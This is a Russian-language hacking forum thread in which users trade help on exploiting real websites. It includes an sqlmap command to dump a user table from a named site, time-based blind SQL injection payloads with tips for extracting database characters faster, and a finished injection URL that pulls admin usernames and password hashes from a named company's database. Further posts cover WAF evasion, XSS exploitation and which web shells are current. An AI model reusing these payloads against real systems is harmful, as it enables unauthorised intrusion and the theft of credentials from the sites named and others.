Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. kostea

    kostea New Member

    Joined:
    23 Dec 2015
    Messages:
    29
    Likes Received:
    0
    Reputations:
    0
    Помогите пожалуйста, возвращает пустой результат

    Code:
     --url="https://eos.aidainternational.org/ResetPassword/3297bc2d-815c-46fd-9488-57433cb3de5a*" --flush-session --risk=3 --level=3 -D dbo -T UserProfiles --dump
     
    #2861 kostea, 23 Jun 2020
    Last edited: 23 Jun 2020
  2. testvalue

    testvalue New Member

    Joined:
    30 May 2020
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Привет.

    Подскажите, плиз.

    Как правильно видоизменить нагрузку вида
    Code:
    'OR(if(now()=sysdate(),sleep(3),0))OR'*/
    для того чтобы начать перебирать символы, например, чтобы получить значение
    Code:
    version()
    базы данных.

    Не хватает понимания :(

    По идее так
    Code:
    'OR(if(substring(version((),1,1)='m',sleep(3),0))OR'*/
    , да?

    Cпасибо.
     
  3. fandor9

    fandor9 Reservists Of Antichat

    Joined:
    16 Nov 2018
    Messages:
    474
    Likes Received:
    748
    Reputations:
    30
    Что-бы узнать имеет-ли 2-ой символ значение 'A':
    Code:
    'OR(if(substring(version(),2,1)='А'),sleep(3),0))OR'*/
    ещё лучше перебирать по ASCII (53='5') т.е. является ли 2ой символ цифрой 5:
    Code:
    'OR(if(ASCII(SUBSTR(VERSION(),2,1))=53),sleep(3),0))OR'*/
     
    testvalue likes this.
  4. testvalue

    testvalue New Member

    Joined:
    30 May 2020
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Спасибо большое, дружище, сейчас пойду пробовать :)
     
  5. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    572
    Likes Received:
    1,098
    Reputations:
    374
    Оказалось немного иначе, но смысл как раз в затруднении детекта.

    Подробный разбор:
    https://blog.malwarebytes.com/threa...ata-exfiltrates-credit-cards-via-image-files/

    Опус от автора техники:
    https://xss.is/threads/39071/
     
    fandor9 likes this.
  6. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,588
    Likes Received:
    405
    Reputations:
    196
    Какие шеллы сейчас актуальны?
     
  7. testvalue

    testvalue New Member

    Joined:
    30 May 2020
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Привет.

    Помогите докрутить скулю и обойти WAF.

    https://www.hbo.ro/TitleDetail.aspx?ScheduleId='OR(if(now()=sysdate(),sleep(5),0))OR'xxx -> True, задержка 5 секунд

    На sleep() реагирует, и видно, что там есть скуля, но при попытке извлечь например, version() или user() cудя по всему срабатывает WAF.

    Пытался через вектор 'OR(if(ASCII(SUBSTR(VERSION(),1,1))=53),sleep(3),0))OR', но облом.

    Спасибо.
     
  8. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,836
    Likes Received:
    399
    Reputations:
    230
    Помогите раскрутить, все идёт с запроса в LIKE
    Code:
    https://www.wbt.de/no_cache/english/contact/europe/austria.html?rmhaendlerinfo[show]=search&no_cache=1&rmhaendlerinfo[word]=sa%22
     
  9. neur0funk

    neur0funk Member

    Joined:
    9 May 2018
    Messages:
    17
    Likes Received:
    14
    Reputations:
    11
    Code:
    https://www.wbt.de/no_cache/english/contact/europe/austria.html?rmhaendlerinfo[show]=search&no_cache=1&rmhaendlerinfo[word]=sa%22/**/or/**/(extractvalue(0x0a,concat(0x0a,(select(group_concat(concat_ws(0x3a,username,password)))from(be_users)))))=%22
     
    DezMond™ likes this.
  10. FireRidlle

    FireRidlle New Member

    Joined:
    7 Jul 2009
    Messages:
    27
    Likes Received:
    4
    Reputations:
    3
    здравствуйте. вопрос по валидации числовых параметров. есть параметр page. если передать 1' то возвращает первую страницу, 1" так же, 2-1 то вторую страницу. -1 ошибка. можно что что сделать?
     
  11. FireRidlle

    FireRidlle New Member

    Joined:
    7 Jul 2009
    Messages:
    27
    Likes Received:
    4
    Reputations:
    3
    еще можно не сравнением а бинарным поиском через >= к примеру если хочешь знаешь что только цифры
    Code:
    'OR(if(ASCII(SUBSTR(VERSION(),2,1))>=53),sleep(3),0))OR'*
    сработало, то берем среднее число из диапазона между 53 и 57, к примеру >=55. не сработало значит чекаешь 53,54. если сработало то 55,56,57. очень ускоряет когда нужно искать цифры и буквы в разном регистре
     
    fandor9 likes this.
  12. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    572
    Likes Received:
    1,098
    Reputations:
    374
    99.9% - ничего. В случае PHP, может выглядеть так:
    Code:
    var_dump(intval("1'"));
    var_dump(intval("2-1")); 
    var_dump(intval(-1));
    
    int(1) //есть в бд
    int(2) //есть в бд
    int(-1) //нет такого, ошибка
    
     
    FireRidlle likes this.
  13. neur0funk

    neur0funk Member

    Joined:
    9 May 2018
    Messages:
    17
    Likes Received:
    14
    Reputations:
    11
    если intval вожно большое число 92233720368547758079 +1 , в запрос попадёт 2e+, но это при условии старого пыха
     
    FireRidlle likes this.
  14. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,836
    Likes Received:
    399
    Reputations:
    230
    Хелп помогите раскрутить
    Code:
    https://www.egtexpress.com/cs/zeme/slovinsko"/?no_cache=1
     
  15. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    480
    Likes Received:
    87
    Reputations:
    21
    Привет Burp/Acunetix показывает XSS
    site.com/ru/?'><script>alert(1)</script>
    Code:
      <meta property="og:url" content='https://site.com/ru/?'><script>alert(1)</script>' />
    Но в браузере происходит URL Encode
    Code:
    <meta property="og:url" content='https://site.com/ru/?%27%3E%3Cscript%3Ealert(1)%3C/script%3' />
    Вопрос есть тут или нет XSS? ведь и за URL Encode ничего не срабатывает.
    Как эксплуатировать?
     
  16. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,781
    Likes Received:
    854
    Reputations:
    857
    Юзать разные Tricks

    Например для IE работает связка через 'location=URL' в чистом виде
    Можно почитать подробнее у BlackFan - https://blog.blackfan.ru/2016/09/ie-location-bug.html
     
    _________________________
    Octavian likes this.
Loading...